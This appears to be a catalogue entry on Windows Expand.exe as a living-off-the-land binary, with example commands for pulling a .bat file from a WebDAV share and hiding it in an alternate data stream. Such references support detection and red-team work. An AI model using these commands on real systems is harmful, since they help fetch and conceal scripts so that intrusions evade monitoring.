~/ cat Expand.exe.md █
Binary that expands one or more compressed files
Paths:
C:\Windows\System32\Expand.exe
C:\Windows\SysWOW64\Expand.exe
Detection:
Download
Copies source file to destination.
expand \\webdav\folder\file.bat c:\ADS\file.bat
Copy
Copies source file to destination.
expand c:\ADS\file1.bat c:\ADS\file2.bat
Alternate data streams
Copies source file to destination Alternate Data Stream (ADS)
expand \\webdav\folder\file.bat c:\ADS\file.txt:file.bat